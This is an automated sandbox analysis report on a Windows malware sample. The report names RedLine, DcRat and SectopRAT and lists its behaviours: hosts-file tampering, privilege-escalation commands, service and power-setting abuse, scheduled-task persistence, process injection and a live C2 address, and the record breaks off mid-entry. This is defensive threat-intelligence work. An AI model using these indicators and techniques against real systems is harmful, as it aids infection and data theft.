Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2024 11:06
Static task
static1
Behavioral task
behavioral1
Sample
1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
Resource
win10v2004-20241007-en
General
-
Target
1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe
-
Size
7.3MB
-
MD5
06293c3726a8b6029225668dcfb8c7e8
-
SHA1
1db3a38e9cff8b2aec7b73668e6768002c2bddbf
-
SHA256
ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
-
SHA512
33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
-
SSDEEP
196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr
Malware Config
Extracted
redline
Lucifer
162.55.169.73:49194
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\explorer.exe family_redline behavioral2/memory/1500-13-0x0000000000C70000-0x0000000000C8E000-memory.dmp family_redline -
Redline family
-
SectopRAT payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\explorer.exe family_sectoprat behavioral2/memory/1500-13-0x0000000000C70000-0x0000000000C8E000-memory.dmp family_sectoprat -
Sectoprat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2500 created 616 2500 powershell.EXE winlogon.exe -
Processes:
powershell.EXEpowershell.EXEpowershell.exepowershell.exepowershell.exepid process 2500 powershell.EXE 3084 powershell.EXE 1180 powershell.exe 2284 powershell.exe 1620 powershell.exe -
Drops file in Drivers directory 4 IoCs
Processes:
conhost.execonhost.execonhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 1092 takeown.exe 3996 icacls.exe 1208 takeown.exe 4016 icacls.exe 5088 takeown.exe 3284 icacls.exe 2608 takeown.exe 3880 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
windowshost.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation windowshost.exe Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 7 IoCs
Processes:
explorer.exesvchost.exewindowshost.exesvchost.execominto.exeupdater.exeupdater.exepid process 1500 explorer.exe 1640 svchost.exe 1532 windowshost.exe 2012 svchost.exe 4440 cominto.exe 1328 updater.exe 1424 updater.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 2608 takeown.exe 3880 icacls.exe 1092 takeown.exe 3996 icacls.exe 1208 takeown.exe 4016 icacls.exe 5088 takeown.exe 3284 icacls.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Power Settings 1 TTPs 20 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.execmd.exepowercfg.execmd.exepid process 3296 powercfg.exe 3600 powercfg.exe 4248 powercfg.exe 3016 powercfg.exe 3624 cmd.exe 2248 powercfg.exe 880 powercfg.exe 228 powercfg.exe 4840 powercfg.exe 2736 powercfg.exe 3056 powercfg.exe 4156 powercfg.exe 1432 powercfg.exe 2212 powercfg.exe 2400 powercfg.exe 1076 powercfg.exe 380 cmd.exe 1472 cmd.exe 4036 powercfg.exe 4100 cmd.exe -
Drops file in System32 directory 11 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exepowershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
conhost.execonhost.exepowershell.EXEconhost.execonhost.exedescription pid process target process PID 4308 set thread context of 4808 4308 conhost.exe conhost.exe PID 4340 set thread context of 836 4340 conhost.exe conhost.exe PID 2500 set thread context of 4668 2500 powershell.EXE dllhost.exe PID 4168 set thread context of 2492 4168 conhost.exe conhost.exe PID 1288 set thread context of 2500 1288 conhost.exe conhost.exe -
Drops file in Windows directory 8 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe -
Launches sc.exe 60 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4168 sc.exe 4896 sc.exe 2400 sc.exe 4172 sc.exe 1984 sc.exe 4900 sc.exe 1932 sc.exe 3392 sc.exe 4672 sc.exe 1808 sc.exe 4472 sc.exe 4808 sc.exe 1632 sc.exe 5044 sc.exe 3048 sc.exe 4900 sc.exe 2608 sc.exe 4520 sc.exe 3056 sc.exe 1856 sc.exe 1076 sc.exe 216 sc.exe 3296 sc.exe 2996 sc.exe 4528 sc.exe 3376 sc.exe 3856 sc.exe 4736 sc.exe 2988 sc.exe 5032 sc.exe 2572 sc.exe 1424 sc.exe 4508 sc.exe 3428 sc.exe 3508 sc.exe 1736 sc.exe 216 sc.exe 2224 sc.exe 3972 sc.exe 4808 sc.exe 952 sc.exe 392 sc.exe 1656 sc.exe 1048 sc.exe 1164 sc.exe 3024 sc.exe 740 sc.exe 2536 sc.exe 2440 sc.exe 1280 sc.exe 920 sc.exe 1564 sc.exe 1736 sc.exe 5060 sc.exe 2356 sc.exe 4256 sc.exe 3268 sc.exe 4864 sc.exe 4608 sc.exe 4780 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exewindowshost.exeexplorer.execmd.exeWScript.exepowershell.exe1db3a38e9cff8b2aec7b73668e6768002c2bddbf.execmd.execmd.execmd.execmd.exepowershell.exepowershell.exepowershell.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language windowshost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={1CEB11FC-AAA2-4D46-AC7F-70CB91DA5A1F}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730891285" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe -
Modifies registry class 1 IoCs
Processes:
windowshost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings windowshost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 4556 schtasks.exe 4256 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.EXEpowershell.EXEdllhost.exepid process 1180 powershell.exe 2284 powershell.exe 2284 powershell.exe 1180 powershell.exe 1620 powershell.exe 1620 powershell.exe 2440 powershell.exe 2440 powershell.exe 1352 powershell.exe 1352 powershell.exe 2440 powershell.exe 1352 powershell.exe 4308 conhost.exe 4308 conhost.exe 4340 conhost.exe 4340 conhost.exe 3084 powershell.EXE 2500 powershell.EXE 2500 powershell.EXE 2500 powershell.EXE 3084 powershell.EXE 2500 powershell.EXE 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe 4668 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeexplorer.execominto.exepowershell.exepowershell.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.EXEdllhost.exedwm.exeExplorer.EXEpowershell.exepowershell.execonhost.exesvchost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 1180 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 1500 explorer.exe Token: SeDebugPrivilege 4440 cominto.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2440 powershell.exe Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 4308 conhost.exe Token: SeShutdownPrivilege 2248 powercfg.exe Token: SeCreatePagefilePrivilege 2248 powercfg.exe Token: SeShutdownPrivilege 4036 powercfg.exe Token: SeCreatePagefilePrivilege 4036 powercfg.exe Token: SeShutdownPrivilege 880 powercfg.exe Token: SeCreatePagefilePrivilege 880 powercfg.exe Token: SeShutdownPrivilege 228 powercfg.exe Token: SeCreatePagefilePrivilege 228 powercfg.exe Token: SeDebugPrivilege 4340 conhost.exe Token: SeShutdownPrivilege 3056 powercfg.exe Token: SeCreatePagefilePrivilege 3056 powercfg.exe Token: SeShutdownPrivilege 3016 powercfg.exe Token: SeCreatePagefilePrivilege 3016 powercfg.exe Token: SeShutdownPrivilege 3296 powercfg.exe Token: SeCreatePagefilePrivilege 3296 powercfg.exe Token: SeShutdownPrivilege 4156 powercfg.exe Token: SeCreatePagefilePrivilege 4156 powercfg.exe Token: SeDebugPrivilege 3084 powershell.EXE Token: SeDebugPrivilege 2500 powershell.EXE Token: SeDebugPrivilege 2500 powershell.EXE Token: SeDebugPrivilege 4668 dllhost.exe Token: SeShutdownPrivilege 316 dwm.exe Token: SeCreatePagefilePrivilege 316 dwm.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 4528 powershell.exe Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeShutdownPrivilege 3432 Explorer.EXE Token: SeCreatePagefilePrivilege 3432 Explorer.EXE Token: SeDebugPrivilege 2792 powershell.exe Token: SeDebugPrivilege 4168 conhost.exe Token: SeAssignPrimaryTokenPrivilege 1236 svchost.exe Token: SeIncreaseQuotaPrivilege 1236 svchost.exe Token: SeSecurityPrivilege 1236 svchost.exe Token: SeTakeOwnershipPrivilege 1236 svchost.exe Token: SeLoadDriverPrivilege 1236 svchost.exe Token: SeSystemtimePrivilege 1236 svchost.exe Token: SeBackupPrivilege 1236 svchost.exe Token: SeRestorePrivilege 1236 svchost.exe Token: SeShutdownPrivilege 1236 svchost.exe Token: SeSystemEnvironmentPrivilege 1236 svchost.exe Token: SeUndockPrivilege 1236 svchost.exe Token: SeManageVolumePrivilege 1236 svchost.exe Token: SeShutdownPrivilege 2212 powercfg.exe Token: SeCreatePagefilePrivilege 2212 powercfg.exe Token: SeShutdownPrivilege 2400 powercfg.exe Token: SeCreatePagefilePrivilege 2400 powercfg.exe Token: SeShutdownPrivilege 1076 powercfg.exe Token: SeCreatePagefilePrivilege 1076 powercfg.exe Token: SeShutdownPrivilege 1432 powercfg.exe Token: SeCreatePagefilePrivilege 1432 powercfg.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exepid process 2332 Conhost.exe 4516 Conhost.exe 4608 Conhost.exe 3392 Conhost.exe 3936 Conhost.exe 4848 Conhost.exe 464 Conhost.exe 1608 Conhost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3432 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1db3a38e9cff8b2aec7b73668e6768002c2bddbf.execmd.execmd.execmd.execmd.execmd.execmd.exewindowshost.exeWScript.execmd.exesvchost.exesvchost.execonhost.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 1892 wrote to memory of 760 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 760 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 760 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3508 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3508 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3508 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 4908 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 4908 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 4908 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3600 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3600 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3600 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3980 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3980 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3980 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3412 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3412 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 1892 wrote to memory of 3412 1892 1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe cmd.exe PID 760 wrote to memory of 1180 760 cmd.exe powershell.exe PID 760 wrote to memory of 1180 760 cmd.exe powershell.exe PID 760 wrote to memory of 1180 760 cmd.exe powershell.exe PID 3980 wrote to memory of 1500 3980 cmd.exe explorer.exe PID 3980 wrote to memory of 1500 3980 cmd.exe explorer.exe PID 3980 wrote to memory of 1500 3980 cmd.exe explorer.exe PID 3508 wrote to memory of 2284 3508 cmd.exe powershell.exe PID 3508 wrote to memory of 2284 3508 cmd.exe powershell.exe PID 3508 wrote to memory of 2284 3508 cmd.exe powershell.exe PID 4908 wrote to memory of 1640 4908 cmd.exe svchost.exe PID 4908 wrote to memory of 1640 4908 cmd.exe svchost.exe PID 3412 wrote to memory of 1532 3412 cmd.exe windowshost.exe PID 3412 wrote to memory of 1532 3412 cmd.exe windowshost.exe PID 3412 wrote to memory of 1532 3412 cmd.exe windowshost.exe PID 3600 wrote to memory of 2012 3600 cmd.exe svchost.exe PID 3600 wrote to memory of 2012 3600 cmd.exe svchost.exe PID 1532 wrote to memory of 3084 1532 windowshost.exe WScript.exe PID 1532 wrote to memory of 3084 1532 windowshost.exe WScript.exe PID 1532 wrote to memory of 3084 1532 windowshost.exe WScript.exe PID 3084 wrote to memory of 2156 3084 WScript.exe cmd.exe PID 3084 wrote to memory of 2156 3084 WScript.exe cmd.exe PID 3084 wrote to memory of 2156 3084 WScript.exe cmd.exe PID 2156 wrote to memory of 4440 2156 cmd.exe cominto.exe PID 2156 wrote to memory of 4440 2156 cmd.exe cominto.exe PID 3508 wrote to memory of 1620 3508 cmd.exe powershell.exe PID 3508 wrote to memory of 1620 3508 cmd.exe powershell.exe PID 3508 wrote to memory of 1620 3508 cmd.exe powershell.exe PID 1640 wrote to memory of 4340 1640 svchost.exe conhost.exe PID 1640 wrote to memory of 4340 1640 svchost.exe conhost.exe PID 1640 wrote to memory of 4340 1640 svchost.exe conhost.exe PID 2012 wrote to memory of 4308 2012 svchost.exe conhost.exe PID 2012 wrote to memory of 4308 2012 svchost.exe conhost.exe PID 2012 wrote to memory of 4308 2012 svchost.exe conhost.exe PID 4340 wrote to memory of 3596 4340 conhost.exe cmd.exe PID 4340 wrote to memory of 3596 